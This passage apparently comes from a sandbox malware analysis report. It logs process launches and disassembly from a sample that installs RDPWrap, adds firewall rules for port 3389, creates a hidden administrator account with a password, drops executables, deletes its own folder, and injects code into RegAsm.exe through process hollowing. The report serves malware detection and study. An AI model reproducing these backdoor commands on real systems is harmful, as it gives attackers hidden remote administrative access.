Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:15:12
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user
Imagebase:	0x950000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:15:12
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user
Imagebase:	0xc00000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:15:15
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:15:15
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:15:15
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Imagebase:	0x400000
File size:	1'785'344 bytes
MD5 hash:	C213162C86BB943BCDF91B3DF381D2F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001A.00000000.2254101327.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001A.00000002.2307164374.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 0000001A.00000000.2254243178.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus matches:	Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	18:15:18
Start date:	26/09/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Imagebase:	0x7ff705890000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:15:18
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpvideominiport.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	32'600 bytes
MD5 hash:	77FF15B9237D62A5CBC6C80E5B20A492
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	18:15:19
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpdr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	169'984 bytes
MD5 hash:	64991B36F0BD38026F7589572C98E3D6
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	18:15:19
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\tsusbhub.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	137'728 bytes
MD5 hash:	CC6D4A26254EB72C93AC848ECFCFB4AF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user RDPUser_615fbfde V24hFLzx4jqu /add
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user RDPUser_615fbfde V24hFLzx4jqu /add
Imagebase:	0x950000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	18:15:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user RDPUser_615fbfde V24hFLzx4jqu /add
Imagebase:	0xc00000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:15:32
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:15:32
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:15:32
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup
Imagebase:	0x950000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	18:15:32
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup
Imagebase:	0xc00000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:15:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	18:15:33
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	18:15:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0x1080000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	18:15:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup "Administrators" RDPUser_615fbfde /add
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	18:15:34
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	18:15:34
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup "Administrators" RDPUser_615fbfde /add
Imagebase:	0x950000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	18:15:34
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup "Administrators" RDPUser_615fbfde /add
Imagebase:	0xc00000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	18:15:34
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	18:15:35
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	18:15:35
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Imagebase:	0x950000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	18:15:35
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Imagebase:	0xc00000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	18:16:18
Start date:	26/09/2024
Path:	C:\ProgramData\BKFHCGIDBA.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\BKFHCGIDBA.exe"
Imagebase:	0xc50000
File size:	385'064 bytes
MD5 hash:	47697A60A96C5ADEF362D8DA9A274B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	18:16:18
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	18:16:19
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf70000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	18:16:21
Start date:	26/09/2024
Path:	C:\ProgramData\BKJJEBKKEH.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\BKJJEBKKEH.exe"
Imagebase:	0xb90000
File size:	413'224 bytes
MD5 hash:	F73186DF5A030CF7F186B0737C3AF1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 42%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	18:16:21
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	18:16:21
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xab0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	18:16:22
Start date:	26/09/2024
Path:	C:\ProgramData\GIEBGIIJDG.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\GIEBGIIJDG.exe"
Imagebase:	0xc0000
File size:	73'216 bytes
MD5 hash:	8C46913FBA5CA6A0CB8C4E839EF3A3AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\GIEBGIIJDG.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	18:16:23
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	18:16:23
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	18:16:23
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user
Imagebase:	0x950000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	18:16:23
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user
Imagebase:	0xc00000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	18:16:26
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AEBAFBGIDHCB" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	18:16:26
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	18:16:27
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xcd0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	34.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	57.1%
Total number of Nodes:	14
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02A62131 Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A620A3,02A62093), ref: 02A622A0
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A622B3
Wow64GetThreadContext.KERNEL32(0000031C,00000000), ref: 02A622D1
ReadProcessMemory.KERNELBASE(00000320,?,02A620E7,00000004,00000000), ref: 02A622F5
VirtualAllocEx.KERNELBASE(00000320,?,?,00003000,00000040), ref: 02A62320
TerminateProcess.KERNELBASE(00000320,00000000), ref: 02A6233F
WriteProcessMemory.KERNELBASE(00000320,00000000,?,?,00000000,?), ref: 02A62378
WriteProcessMemory.KERNELBASE(00000320,00400000,?,?,00000000,?,00000028), ref: 02A623C3
WriteProcessMemory.KERNELBASE(00000320,?,?,00000004,00000000), ref: 02A62401
Wow64SetThreadContext.KERNEL32(0000031C,01040000), ref: 02A6243D
ResumeThread.KERNELBASE(0000031C), ref: 02A6244C

Strings

SetThreadContext, xrefs: 02A62257
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02A6229F
CreateProcessA, xrefs: 02A621E5
GetP, xrefs: 02A621B3
WriteProcessMemory, xrefs: 02A62244
VirtualAllocEx, xrefs: 02A62231
GetThreadContext, xrefs: 02A6220B
aryA, xrefs: 02A62177
TerminateProcess, xrefs: 02A6232F
VirtualAlloc, xrefs: 02A621F8
ress, xrefs: 02A621BB
ReadProcessMemory, xrefs: 02A6221E
Load, xrefs: 02A6216F
ResumeThread, xrefs: 02A6226D

Memory Dump Source

Source File: 00000000.00000002.2069309018.0000000002A61000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a61000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 215db7f8ee98b4cbd7b35f9fd8cfe47438260328cffac5620bea612220740fa9
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: A6B1E67664024AAFDB60CF68CC80BDA77A5FF88714F158564EA0CAB341D774FA41CB94

Function 00EA0C40 Relevance: .3, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2068631922.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a8a803287e16eb923a890709fe09a03b70e8903ac52c731e2a04e76fb5538fd
Instruction ID: 96db586d9e2909278b4a45d8f264cc22b1f4593dd8ccc9f4e056aa8673c30386
Opcode Fuzzy Hash: 5a8a803287e16eb923a890709fe09a03b70e8903ac52c731e2a04e76fb5538fd
Instruction Fuzzy Hash: 2ED18A71A042589FCB15CFA8C8806EDFBF2EF49314F248569E855FB246D734AD81CBA4

Function 00EA1220 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00EA12A0

Memory Dump Source

Source File: 00000000.00000002.2068631922.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 976758c96ad8a29a3a7aa86ae526008bb215e7f47579d4046bd46f0be3b6ad2c
Instruction ID: ffa48905e385fc0ad777ca5c3c6ed370e7dfacd361ac429d9860a811779e909d
Opcode Fuzzy Hash: 976758c96ad8a29a3a7aa86ae526008bb215e7f47579d4046bd46f0be3b6ad2c
Instruction Fuzzy Hash: 852136B1C002499FCB10DFAAC880AEEFBF4FF49310F10842AE919A7250C774A940CFA1

Analysis Process: RegAsm.exePID: 5280, Parent PID: 5704COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
strlen.MSVCRT ref: 004046F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
